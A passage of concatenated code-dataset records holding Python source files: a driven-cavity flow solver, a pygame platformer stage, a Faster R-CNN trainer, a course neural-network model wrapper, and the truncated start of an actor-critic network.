ddudyy=(U[i][j+1]-2*U[i][j]+U[i][j-1])/(dely*dely)\r\n duudx=(1/delx)*((((U[i][j]+U[i+1][j])/2)**2)-(((U[i-1][j]+U[i][j])/2)**2))+alpha*(1/(4*delx))*((abs(U[i][j]+U[i+1][j])*(U[i][j]-U[i+1][j]))-(abs(U[i-1][j]+U[i][j])*(U[i-1][j]-U[i][j]))) \r\n duvdy=(1/(dely*4))*((V[i][j]+V[i+1][j])*(U[i][j]+U[i][j+1])-(V[i][j-1]+V[i+1][j-1])*(U[i][j-1]+U[i][j]))+alpha*(1/(dely*4))*((abs(V[i][j]+V[i+1][j])*(U[i][j]-U[i][j+1]))-(abs(V[i][j-1]+V[i+1][j-1])*(U[i][j-1]-U[i][j])))\r\n F[i][j]=U[i][j]+delt*(((1/Re)*(ddudxx+ddudyy))-duudx-duvdy+GX)\r\n for i in range(1, imax+1):\r\n for j in range(1, jmax):\r\n duvdx=(1/(delx*4))*((U[i][j]+U[i][j+1])*(V[i][j]+V[i+1][j])-(U[i-1][j]+U[i-1][j+1])*(V[i-1][j]+V[i][j]))+alpha*(1/(delx*4))*((abs(U[i][j]+U[i][j+1])*(V[i][j]-V[i+1][j]))-(abs(U[i-1][j]+U[i-1][j+1])*(V[i-1][j]-V[i][j])))\r\n dvvdy=(1/dely)*((((V[i][j]+V[i][j+1])/2)**2)-(((V[i][j-1]+V[i][j])/2)**2))+alpha*(1/(4*dely))*((abs(V[i][j]+V[i][j+1])*(V[i][j]-V[i][j+1]))-(abs(V[i][j-1]+V[i][j])*(V[i][j-1]-V[i][j])))\r\n ddvdxx=(V[i+1][j]-2*V[i][j]+V[i-1][j])/(delx*delx)\r\n ddvdyy=(V[i][j+1]-2*V[i][j]+V[i][j-1])/(dely*dely)\r\n G[i][j]=V[i][j]+delt*(((1/Re)*(ddvdxx+ddvdyy))-duvdx-dvvdy+GY)\r\n\r\n\r\n#cacluates the right hand side of formula (14)\r\n#RHS matrix has to exist already\r\n#has no return value\r\ndef calculate_RHS(imax, jmax, delt, delx, dely, F, G, RHS):\r\n for i in range(1, imax+1):\r\n for j in range(1, jmax+1):\r\n RHS[i][j]=(1/delt)*(((F[i][j]-F[i-1][j])/delx)+((G[i][j]-G[i][j-1])/dely))\r\n\r\n#applies boundary conditios (19) to P\r\ndef apply_boundary_conditions_Pressure(imax, jmax, P):\r\n for j in range(1, jmax+1):\r\n P[0][j]=P[1][j]\r\n P[imax+1][j]=P[imax][j]\r\n for i in range(1, imax+1):\r\n P[i][0]=P[i][1]\r\n P[i][jmax+1]=P[i][jmax]\r\n \r\ndef make_B_to_a_copy_of_A(imax, jmax, B, A):\r\n for i in range(0, imax+2):\r\n for j in range(0, jmax+2):\r\n B[i][j]=A[i][j]\r\n \r\n#calculates P using boundary conditions (19) and SOR (15)\r\n#P has to exist already\r\n#returns number of iterations and norm of residuum\r\ndef calculate_Pressure_with_SOR(imax, jmax, itermax, delx, dely, eps, omg, RHS, P):\r\n apply_boundary_conditions_Pressure(imax, jmax, P)\r\n #make second matrix to store the old values\r\n P_old=np.zeros([imax+2, jmax+2], float)\r\n make_B_to_a_copy_of_A(imax, jmax, P_old, P)\r\n \r\n it=0\r\n res_squared=eps*eps+1\r\n while iteps*eps:\r\n apply_boundary_conditions_Pressure(imax, jmax, P)\r\n apply_boundary_conditions_Pressure(imax, jmax, P_old)\r\n #do 1 SOR cycle\r\n for i in range(1, imax+1):\r\n for j in range(1, jmax+1):\r\n P[i][j]=(1-omg)*P_old[i][j]+(omg/(2*((1/delx**2)+(1/dely**2))))*(((P_old[i+1][j]+P[i-1][j])/delx**2)+((P_old[i][j+1]+P[i][j-1])/dely**2)-RHS[i][j])\r\n make_B_to_a_copy_of_A(imax, jmax, P_old, P)\r\n #calculate residuum (16)\r\n res_squared=sum( [sum( [(((P[i+1][j]-2*P[i][j]+P[i-1][j])/delx**2)+((P[i][j+1]-2*P[i][j]+P[i][j-1])/dely**2)-RHS[i][j])**2 for j in range(1, jmax+1)] ) for i in range(1, imax+1)] )/(imax*jmax)\r\n it+=1\r\n# =============================================================================\r\n# if(res_squared>eps*eps):\r\n# print(\"SOR didnt yield a result that was close enough\")\r\n# =============================================================================\r\n return it, sqrt(res_squared)\r\n\r\n\r\n\r\n\r\n\r\n#calculate velocities U and V according to (10) and (11)\r\ndef calculate_U_and_V(imax, jmax, delt, delx, dely, F, G, P, U, V):\r\n for i in range(1, imax):\r\n for j in range(1, jmax+1):\r\n U[i][j]=F[i][j]-(delt/delx)*(P[i+1][j]-P[i][j])\r\n for i in range(1, imax+1):\r\n for j in range(1, jmax):\r\n V[i][j]=G[i][j]-(delt/dely)*(P[i][j+1]-P[i][j])\r\n\r\ndef write_output_into_file(filename, xlength, ylength, imax, jmax, U, V, P, U2, V2):\r\n #colculate U2 and V2 as the values of U and V in the middle of cells\r\n for i in range(1, imax+1):\r\n for j in range(1, jmax+1):\r\n U2[i][j]=(U[i][j-1]+U[i][j])/2\r\n V2[i][j]=(V[i][j]+V[i+1][j])/2\r\n #write data into file\r\n with open(filename, 'w') as myfile:\r\n myfile.write(str(xlength))\r\n myfile.write(\"\\n\")\r\n myfile.write(str(ylength))\r\n myfile.write(\"\\n\")\r\n myfile.write(str(imax))\r\n myfile.write(\"\\n\")\r\n myfile.write(str(jmax))\r\n myfile.write(\"\\n\")\r\n for i in range(1,imax+1):\r\n for j in range(1, jmax+1):\r\n myfile.write(str(U2[i][j]))\r\n myfile.write(\" \")\r\n myfile.write(\"\\n\")\r\n for i in range(1,imax+1):\r\n for j in range(1, jmax+1):\r\n myfile.write(str(V[i][j]))\r\n myfile.write(\" \")\r\n myfile.write(\"\\n\")\r\n for i in range(1,imax+1):\r\n for j in range(1, jmax+1):\r\n myfile.write(str(P[i][j]))\r\n myfile.write(\" \")\r\n myfile.write(\"\\n\")\r\n \r\n\r\n#b)\r\n\r\n#ALGORITHM:\r\n\r\n#first create new directory to store resulting files in\r\n#delete its content after using it, or ambiguities might occur\r\n\r\n\r\nif not os.path.exists(\"Files\"):\r\n os.makedirs(\"Files\")\r\n\r\nimax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI=read_parameters_from_file(inputname)\r\ndel_vec2=del_vec\r\n\r\nt=0\r\ndelx,dely=calculate_delx_dely(imax,jmax,xlength,ylength)\r\nU,V,P=initialize_fields_UVP(imax,jmax, UI, VI, PI)\r\n#matices that will be used in the algorithm\r\nF=np.zeros([imax+2, jmax+2], float)\r\nG=np.zeros([imax+2, jmax+2], float)\r\nRHS=np.zeros([imax+2, jmax+2], float)\r\nU2=np.zeros([imax+2, jmax+2], float)\r\nV2=np.zeros([imax+2, jmax+2], float)\r\nnumber_of_files=0\r\nwhile tdel_vec):\r\n number_of_files+=1\r\n write_output_into_file(\"Files/\"+outputname+\"_{0:03}\".format(number_of_files), xlength, ylength, imax, jmax, U, V, P, U2, V2)\r\n del_vec=t+del_vec2\r\n t+=delt\r\nnumber_of_files+=1\r\nwrite_output_into_file(\"Files/\"+outputname+\"_{0:03}\".format(number_of_files), xlength, ylength, imax, jmax, U, V, P, U2, V2)\r\n\r\n","sub_path":"Exercise Sheet 5/driven_cavity.py","file_name":"driven_cavity.py","file_ext":"py","file_size_in_byte":11380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"400012789","text":"# -*- encoding: utf-8 -*-\n\nimport sys\n\nfrom characters.Enemy import *\nfrom characters.Item import *\nfrom stage.regular.Background import *\nfrom stage.regular.HUD import HUD\nfrom stage.regular.Platform import Platform\nfrom stage.regular.Scene import Scene\n\n\ndef str_to_class(str):\n return getattr(sys.modules[__name__], str)\n\n\nclass Stage(Scene):\n def __init__(self, manager, data, player, platformGroup, spriteGroup, enemyGroup, itemGroup, deadBodiesGroup):\n Scene.__init__(self, manager)\n\n self.MAP_UNIT_WIDTH = 55\n self.MAP_UNIT_HEIGHT = 55\n # Asignación de letras a objetos\n self.platform_letter = [\"0\", \"1\", \"2\"]\n self.enemy_letter = [\"a\", \"b\", \"m\", \"n\", \"s\"]\n self.fire_letter = \"f\"\n self.heart_letter = \"h\"\n self.door_letter = \"d\"\n self.wardrove_letter = \"w\"\n self.chandelier_letter = \"c\"\n self.coin_letter = \"$\"\n self.health_potion_letter = \"p\"\n self.manager = manager\n self.data = data\n self.screen = self.manager.getScreen()\n self.player = player\n self.playerStartPosition = self.player.getGlobalPosition()\n self.playerDisplacement = list((0, 0))\n\n # Initialize groups\n self.spriteGroup = spriteGroup\n self.platformGroup = platformGroup\n self.enemyGroup = enemyGroup\n self.itemGroup = itemGroup\n self.deadBodiesGroup = deadBodiesGroup\n\n self.initialize_lifebar_finalenemy()\n self.setup()\n\n def setup(self):\n\n # cargo el mapa\n self.map = self.data[\"map\"]\n self.levelDimensions = (1024, (len(\n self.map) + 10) * self.MAP_UNIT_HEIGHT) # ((int(self.data[\"dimensions\"][0]), int(self.data[\"dimensions\"][1])))\n # Genero la capa del Fondo\n self.background = BackGround(self.manager, self.data[\"bglayers\"], self.player, self.levelDimensions)\n self.platformfiles = self.data[\"platform_files\"]\n # Creamos el nivel a partir de fichero de texto\n self.create_level()\n # Creamos el HUD\n self.HUD = HUD(self.manager, self.player)\n\n def create_level(self):\n # Variables\n column_number = 0\n row_number = 0\n\n for line in self.map:\n platform_size = 0\n prev_letter = \" \"\n for letter in line:\n # Si hay la letra asignada a plataformas, aumentamos el tamaño de la plataforma a crear una posición\n if letter in self.platform_letter:\n platform_size = platform_size + 1\n\n # Create enemies\n if letter in self.enemy_letter:\n if letter == \"a\":\n tmp = Asmodeo(self.manager, self.manager.getDataRetriever())\n elif letter == \"b\":\n tmp = Belcebu(self.manager, self.manager.getDataRetriever())\n elif letter == \"m\":\n tmp = Mammon(self.manager, self.manager.getDataRetriever())\n elif letter == \"n\":\n tmp = Dante(self.manager, self.manager.getDataRetriever())\n elif letter == \"s\":\n tmp = Satan(self.manager, self.manager.getDataRetriever())\n tmp.enemyGroup = self.enemyGroup\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.enemyGroup.add(tmp)\n\n # Create Items\n if letter == self.fire_letter:\n tmp = Fire(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.heart_letter:\n tmp = Heart(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.door_letter:\n tmp = Door(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.chandelier_letter:\n tmp = Chandelier(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.wardrove_letter:\n tmp = Wardrove(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.health_potion_letter:\n tmp = HealthPotion(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n if letter == self.coin_letter:\n tmp = Coin(self.manager, self.manager.getDataRetriever(), self.itemGroup)\n tmp.setPosition((column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT))\n self.itemGroup.add(tmp)\n\n # Creamos plataformas\n if not letter in self.platform_letter and prev_letter in self.platform_letter:\n platform = Platform(\n self.manager,\n (column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT),\n self.platformfiles[int(prev_letter)],\n platform_size)\n self.platformGroup.add(platform)\n platform_size = 0\n\n # Incrementar el contador de columnas\n column_number = column_number + 1\n\n # Asignar el valor de la letra actual a la variable prev_letter\n prev_letter = letter\n\n # Create last platform\n if prev_letter in self.platform_letter:\n platform = Platform(\n self.manager,\n (column_number * self.MAP_UNIT_WIDTH, row_number * self.MAP_UNIT_HEIGHT),\n self.platformfiles[int(prev_letter)],\n platform_size)\n self.platformGroup.add(platform)\n\n # Incrementar el contador de filas\n row_number = row_number + 1\n column_number = 0\n # print \"posicion bottom-->\",(row_number-1)*55\n\n def update(self, clock):\n self.manager.getScreen().fill(int(self.data[\"bgColor\"], 16)) # en windows es necesario =\\ en mac no\n # Calculo la distancia entre la posicion inicial del jugador y la actual\n # Este valor se le pasa a Background y Platform para que realice el scroll\n # solo actualizo el scroll si el jugador esta saltando o cayendo\n if self.player.getDoUpdateScroll() & self.getDoUpdateScroll():\n self.playerDisplacement = (\n 0, # int(math.ceil(self.playerStartPosition[0]-self.player.getPosition()[0])),\n int(math.ceil(self.playerStartPosition[1] - self.player.getGlobalPosition()[1]))\n )\n # print \"player \", self.player.getGlobalPosition()[1], self.player.getLocalPosition()[1]\n self.background.update(clock, self.playerDisplacement)\n\n for p in self.platformGroup:\n p.update(clock, self.playerDisplacement)\n\n for i in self.itemGroup:\n i.update(clock, self.playerDisplacement)\n\n self.player.update(clock, self.playerDisplacement, self.platformGroup, self.enemyGroup, self.itemGroup)\n self.enemyGroup.update(clock, self.player, self.playerDisplacement)\n self.deadBodiesGroup.update(clock, self.player, self.playerDisplacement)\n # self.player.enemy_coll(self.enemyGroup, self.player)\n self.HUD.update()\n\n def draw(self):\n self.background.draw()\n self.platformGroup.draw(self.manager.getScreen())\n self.itemGroup.draw(self.manager.getScreen())\n self.enemyGroup.draw(self.manager.getScreen())\n self.deadBodiesGroup.draw(self.manager.getScreen())\n self.spriteGroup.draw(self.manager.getScreen())\n self.HUD.draw()\n self.draw_lifebar_finalenemy()\n # Descomentar esta línea para mostrar los rects de colisión de todos los elementos del juego\n # self.draw_collision_rects()\n\n def draw_collision_rects(self):\n # Platform rects\n for item in self.itemGroup:\n self.draw_transparent_rect(item.getRect(), (255, 255, 255, 50))\n\n # Enemy rects\n for enemy in self.enemyGroup:\n self.draw_transparent_rect(enemy.getRect(), (255, 10, 10, 100))\n self.draw_transparent_rect(enemy.activity_range_rect, (10, 255, 255, 100))\n # self.draw_transparent_rect(enemy.getCollisionRect(), (0, 0, 0, 100))\n\n # Player rects\n self.draw_transparent_rect(self.player.getRect(), (23, 100, 255, 100))\n self.draw_transparent_rect(self.player.getCollisionRect(), (10, 255, 255, 100))\n\n def draw_transparent_rect(self, rect, colour):\n tmp = pygame.Surface((rect.width, rect.height), pygame.SRCALPHA, 32)\n tmp.fill(colour)\n self.manager.getScreen().blit(tmp, (rect.left, rect.top))\n\n def initialize_lifebar_finalenemy(self):\n self.healthbar_length = 200\n self.healthbar_height = 20\n\n def draw_lifebar_finalenemy(self):\n for enemy in self.enemyGroup:\n if type(enemy).__name__ == \"Satan\":\n if not enemy.health == 500:\n health = enemy.health\n x = enemy.getRect().left + enemy.getRect().width / 2 - self.healthbar_length / 2\n y = enemy.getRect().top - 50\n\n # Escogemos color para la barra de salud\n if health < 20:\n foreground_color = (255, 0, 0)\n else:\n foreground_color = (0, 255, 0)\n\n # Calculamos tamaño de la barra de salud\n health_value = (float(health) / 500 * self.healthbar_length)\n outline_rect = pygame.Rect(x, y, self.healthbar_length, self.healthbar_height)\n fill_rect = pygame.Rect(x, y, health_value, self.healthbar_height)\n\n # Dibujamos\n pygame.draw.rect(self.screen, (70, 70, 70), outline_rect)\n pygame.draw.rect(self.screen, foreground_color, fill_rect)\n pygame.draw.rect(self.screen, (0, 0, 0), outline_rect, 3)\n\n def events(self, events_list):\n self.player.move(pygame.key.get_pressed())\n self.HUD.events(events_list)\n\n def resetScroll(self):\n self.playerDisplacement = (0, 0)\n\n def getDoUpdateScroll(self):\n return True\n","sub_path":"src/stage/regular/Stage.py","file_name":"Stage.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"36136274","text":"from data import data\nfrom data.data import Dataset\nimport torch \nimport fire\nimport time\nimport os, sys\nimport tqdm\nfrom typing import Dict, Tuple\nfrom torch import nn, optim\nfrom torch.nn import functional\nfrom collections import namedtuple\nfrom visdom import Visdom\n\nfrom face_detection import cig\nfrom face_detection import FasterRcnn\nfrom face_detection.utils import *\n\nclass EasyTrainer(nn.Module): ...\n\nLossTuple = namedtuple(\"LossTuple\", [\n 'rpn_loc_loss',\n 'rpn_cls_loss',\n 'roi_loc_loss',\n 'roi_cls_loss',\n 'total_loss'\n])\n\ndef time_count(f):\n def wrapper(*args, **kwargs):\n start = time.time()\n temp = f(*args, **kwargs)\n print(\"\\033[32mcost time\\033[0m:\", round(time.time() - start, 3), \"\\033[33msecond(s)\\033[0m\")\n return temp\n return wrapper\n\n\n# A single wrapper for easy training process\nclass EasyTrainer(nn.Module):\n def __init__(self, faster_rcnn : FasterRcnn):\n super().__init__()\n\n self.faster_rcnn : FasterRcnn = faster_rcnn\n self.loc_nor_mean : Tuple[float] = faster_rcnn.loc_nor_mean\n self.loc_nor_std : Tuple[float] = faster_rcnn.loc_nor_std\n self.optimizer : optim = faster_rcnn.set_optimizer()\n\n self.rpn_sigma : float = cig.rpn_sigma\n self.roi_sigma : float = cig.roi_sigma\n\n # create target creater\n self.anchorTC : AnchorTargetCreator = AnchorTargetCreator()\n self.proposalTC : ProposalTargetCreator = ProposalTargetCreator()\n \n def forward(self, images : torch.Tensor, bboxes : torch.Tensor, labels : torch.Tensor, scale : float) -> LossTuple:\n if bboxes.shape[0] != 1:\n raise RuntimeError(\"batch_size must be 1!!!\")\n \n _, _, H, W = images.shape\n feature_mapping = self.faster_rcnn.extractor(images)\n rpn_locs, rpn_scores, rois, _, anchor = self.faster_rcnn.rpn(\n x=feature_mapping,\n img_size=[H, W],\n scale=scale\n )\n\n # note that batch size is 1\n bbox = bboxes[0]\n label = labels[0]\n rpn_score = rpn_scores[0]\n rpn_loc = rpn_locs[0]\n roi = rois\n \n # align to get the proposal target value\n sample_roi, gt_roi_loc, gt_roi_label = self.proposalTC(\n roi=roi,\n bbox=safe_to_numpy(bbox),\n label=safe_to_numpy(label),\n loc_normalize_mean=self.loc_nor_mean,\n loc_normalize_std=self.loc_nor_std\n )\n\n sample_roi = safe_to_tensor(sample_roi)\n gt_roi_loc = safe_to_tensor(gt_roi_loc)\n gt_roi_label = safe_to_tensor(gt_roi_label)\n\n # note that we do the forwarding for one data in a batch\n # so all the choosen data in one batch is the first data, whose \n # corresponding index is 0\n sample_roi_indices = torch.zeros(len(sample_roi))\n\n roi_cls_loc, roi_score = self.faster_rcnn.roi_head(\n x=feature_mapping,\n rois=sample_roi,\n roi_indices=sample_roi_indices\n )\n\n \"\"\"calculate the RPN loss\"\"\"\n gt_rpn_loc, gt_rpn_label = self.anchorTC(\n bbox=safe_to_numpy(bbox),\n anchor=anchor,\n img_size=[H, W]\n )\n gt_rpn_label : torch.Tensor = torch.LongTensor(gt_rpn_label)\n gt_rpn_loc : torch.Tensor = safe_to_tensor(gt_rpn_loc)\n\n rpn_loc_loss: torch.Tensor = fast_rcnn_loc_loss(\n pred_loc=rpn_loc,\n gt_loc=gt_rpn_loc,\n gt_label=gt_rpn_label.data,\n sigma=self.rpn_sigma\n )\n\n # remember to ignore the bbox whose tag is -1\n rpn_cls_loss : torch.Tensor = functional.cross_entropy(\n input=rpn_score,\n target=gt_rpn_label.cuda() if cig.use_cuda else gt_rpn_label.cpu(),\n ignore_index=-1 \n )\n\n # cut the path of gradient to reduce the cost on GPU and remove all the label is -1\n mask : torch.Tensor = gt_rpn_label > -1\n gt_rpn_label : torch.Tensor = gt_rpn_label[mask]\n rpn_score : torch.Tensor = rpn_score[mask]\n\n \"\"\"calculate the RoI loss\"\"\"\n n : int = roi_cls_loc.shape[0]\n roi_cls_loc : torch.Tensor = roi_cls_loc.view(n, -1, 4)\n\n roi_loc : torch.Tensor = roi_cls_loc[\n torch.arange(0, n),\n gt_roi_label\n ].contiguous()\n\n roi_loc_loss : torch.Tensor = fast_rcnn_loc_loss(\n pred_loc=roi_loc,\n gt_loc=gt_roi_loc,\n gt_label=gt_roi_label,\n sigma=self.roi_sigma\n )\n\n roi_cls_loss = functional.cross_entropy(\n input=roi_score,\n target=gt_roi_label\n ) \n\n\n # count all the loss\n total_loss = rpn_cls_loss + rpn_loc_loss + roi_cls_loss + roi_loc_loss\n loss_tuple = LossTuple(\n rpn_loc_loss=rpn_loc_loss,\n rpn_cls_loss=rpn_cls_loss,\n roi_loc_loss=roi_loc_loss,\n roi_cls_loss=roi_cls_loss,\n total_loss=total_loss\n )\n return loss_tuple\n \n def train_one_image(self, images : torch.Tensor, bboxes : torch.Tensor, labels : torch.Tensor, scale : float) -> LossTuple:\n \"\"\"\n Args\n - images : Actually it is an image, which is shaped as [1, C, H, W]\n - bboxes : GT bbox of the items, which is shaped as [1, d, 4]\n - labels : class of each bboxes, which is shaped as [1, d]\n - scale : ratio between preprocessed image and original image \n \"\"\"\n self.optimizer.zero_grad()\n loss_tuple = self.forward(\n images=images,\n bboxes=bboxes,\n labels=labels,\n scale=scale\n )\n loss_tuple.total_loss.backward()\n self.optimizer.step()\n return loss_tuple\n \n def save(self, save_path : str = None, save_optimizer : bool = True, **kwargs):\n save_dict = {\n \"model\" : self.faster_rcnn.state_dict(),\n \"config\" : cig.state_dict(),\n \"optimizer\" : self.optimizer.state_dict() if save_optimizer else None,\n \"info\" : kwargs\n }\n\n if save_path is None:\n local_time = time.strftime(\"%m%d%H%M\")\n save_path = \"checkpoints/fasterrcnn_{}\".format(local_time)\n for value in kwargs.values():\n save_path += \"_{}\".format(value)\n \n save_dir = os.path.dirname(save_path)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n torch.save(save_dict, save_path)\n\n def load(self, path : str, load_optimizer : bool = True, load_config : bool = True) -> EasyTrainer:\n state_dict = torch.load(path)\n self.faster_rcnn.load_state_dict(\n state_dict=state_dict[\"model\"] if \"model\" in state_dict else state_dict\n )\n\n if load_optimizer and \"optimizer\" in state_dict and state_dict[\"optimizer\"] is not None:\n self.optimizer.load_state_dict(state_dict[\"optimizer\"])\n\n if load_config and \"config\" in state_dict and state_dict[\"config\"] is not None:\n cig.load_dict(state_dict[\"config\"])\n return self\n \n\n@time_count\ndef train(**kwargs): \n # load the configer\n cig.load_dict(**kwargs)\n\n # create model and training wrapper\n model = FasterRcnn()\n trainer = EasyTrainer(model)\n print(\"\\033[32m{}\\033[0m\".format(\"complete creating model and trainer\"))\n if cig.use_cuda:\n trainer = trainer.cuda()\n if cig.model_path:\n trainer.load(\n path=cig.model_path,\n load_optimizer=True,\n load_config=True\n )\n # create visdom\n vis = Visdom()\n\n # for decay of the learning rate\n cur_lr = cig.learning_rate\n \n # create loader of dataset\n data_set = Dataset()\n epoch_iter = tqdm.tqdm(range(cig.epoch), **cig.EPOCH_LOOP_TQDM)\n for epoch in epoch_iter:\n loader = data_set.get_train_loader()\n indices = range(data_set.training_sample_num()) # for progress bar in tqdm\n index_iter = tqdm.tqdm(indices, **cig.BATCH_LOOP_TQDM)\n epoch_iter.set_description_str(\"\\033[32mEpoch {}\\033[0m\".format(epoch))\n\n for index, (b_img, b_bbox, b_label, scales) in zip(index_iter, loader):\n scale : float = scales[0]\n\n loss_tuple = trainer.train_one_image(\n images=b_img,\n bboxes=b_bbox,\n labels=b_label,\n scale=scale\n )\n\n post_info = \"\\033[33m{},{},{},{},{}\\033[0m\".format(\n round(loss_tuple.rpn_cls_loss.item(), 2), \n round(loss_tuple.rpn_loc_loss.item(), 2), \n round(loss_tuple.roi_cls_loss.item(), 2), \n round(loss_tuple.roi_loc_loss.item(), 2), \n round(loss_tuple.total_loss.item(), 2)\n )\n \n # set prefix and suffix info for tqdm iterator\n index_iter.set_description_str(\"\\033[32mEpoch {} complete!\\033[0m\".format(epoch)\n if index == (data_set.training_sample_num() - 1) else \"\\033[35mtraining...\\033[0m\")\n index_iter.set_postfix_str(post_info)\n\n trainer.save()\n\nif __name__ == \"__main__\":\n fire.Fire(train)","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":9211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"587401530","text":"# Copyright 2017 Mark Pfeiffer, ASL, ETH Zurich, Switzerland\n# Copyright 2017 Fadri Furrer, ASL, ETH Zurich, Switzerland\n# Copyright 2017 Renaud Dubé, ASL, ETH Zurich, Switzerland\n\nimport numpy as np\nimport FCLayer as fc_layer\nimport pickle as pkl\nimport os\n\n\nclass Params():\n\n training_batch_size = 10\n max_training_steps = 1000\n print_steps = 100\n\n\nclass ModelWrapper():\n\n network = None\n optimizer = None\n loss_function = None\n x = None\n y_target = None\n params = None\n current_idx = 0\n\n def __init__(self, network, loss_function, optimizer, x, y_target, params):\n self.params = params\n self.network = network\n self.optimizer = optimizer\n self.loss_function = loss_function\n # Training data\n self.x = x\n self.y_target = y_target\n\n def setNetwork(self, network):\n self.network = network\n\n def getNetwork(self):\n return self.network\n\n def setOptimizer(self, optimizer):\n self.optimizer = optimizer\n\n def getOptimizer(self):\n return self.optimizer\n\n def getNextDataPoint(self):\n if self.current_idx >= self.x.shape[0]:\n self.current_idx = 0\n input_batch = np.array([self.x[self.current_idx, :]])\n label_batch = np.array([self.y_target[self.current_idx, :]])\n self.current_idx += 1\n return input_batch, label_batch\n\n def getNextTrainingBatch(self, batch_size=1):\n input_batch = np.zeros([batch_size, self.x.shape[1]])\n label_batch = np.zeros([batch_size, self.y_target.shape[1]])\n for i in range(batch_size):\n X, y_target = self.getNextDataPoint()\n input_batch[i, :] = X\n label_batch[i, :] = y_target\n return input_batch, label_batch\n\n def prediction(self, x):\n y_net = self.network.output(x)\n y = np.zeros(y_net.shape)\n y[0, np.argmax(y_net)] = 1\n return y\n\n def train(self):\n step = 0\n loss_evolution = np.zeros([self.params.max_training_steps, 2])\n while step < self.params.max_training_steps:\n x_batch, y_target_batch = self.getNextTrainingBatch(\n self.params.training_batch_size)\n loss = self.optimizer.updateStep(self.network, self.loss_function,\n x_batch, y_target_batch)\n loss_evolution[step, :] = np.array([step, loss])\n if step % self.params.print_steps == 0:\n print(\"Loss in step {} is {}.\".format(step, loss))\n step += 1\n\n return loss_evolution\n\n def eval(self, x, y_target):\n eval_size = x.shape[0]\n correct_classifications = 0\n for i in range(eval_size):\n prediction = self.prediction(np.array([x[i, :]]))\n truth = np.array([y_target[i, :]])\n if np.all(prediction == truth):\n correct_classifications += 1.0\n return correct_classifications / float(eval_size)\n\n def loss(self, x, y_target):\n return self.loss_function.evaluate(self.prediction(x), y_target)\n\n def gradients(self, x, y_target):\n return self.network.gradients(x, self.loss_function, y_target)\n","sub_path":"5_deep_learning/solution/01_DL_framework/ModelWrapper.py","file_name":"ModelWrapper.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"120032772","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\n\ndef pi_newtork(obs_size, act_size, hidden_size):\n net = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, act_size),\n nn.Tanh())\n return net\n\ndef q_newtork(obs_size, act_size, hidden_size):\n in_size = obs_size + act_size\n net = nn.Sequential(\n nn.Linear(in_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1),\n nn.Identity())\n return net\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\nclass MLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n device='cuda'\n pi_sizes = [obs_dim] + list(hidden_sizes) + [act_dim]\n #print(obs_dim, act_dim, hidden_sizes)\n self.pi = pi_newtork(obs_dim,act_dim, hidden_sizes[0])#mlp(pi_sizes, activation, nn.Tanh)\n self.act_limit = torch.from_numpy(act_limit).to(device)\n\n def forward(self, obs):\n # Return output from network scaled to action space limits.\n return self.act_limit * self.pi(obs)\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = q_newtork(obs_dim,act_dim, hidden_sizes[0])#mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high\n device = 'cuda'\n 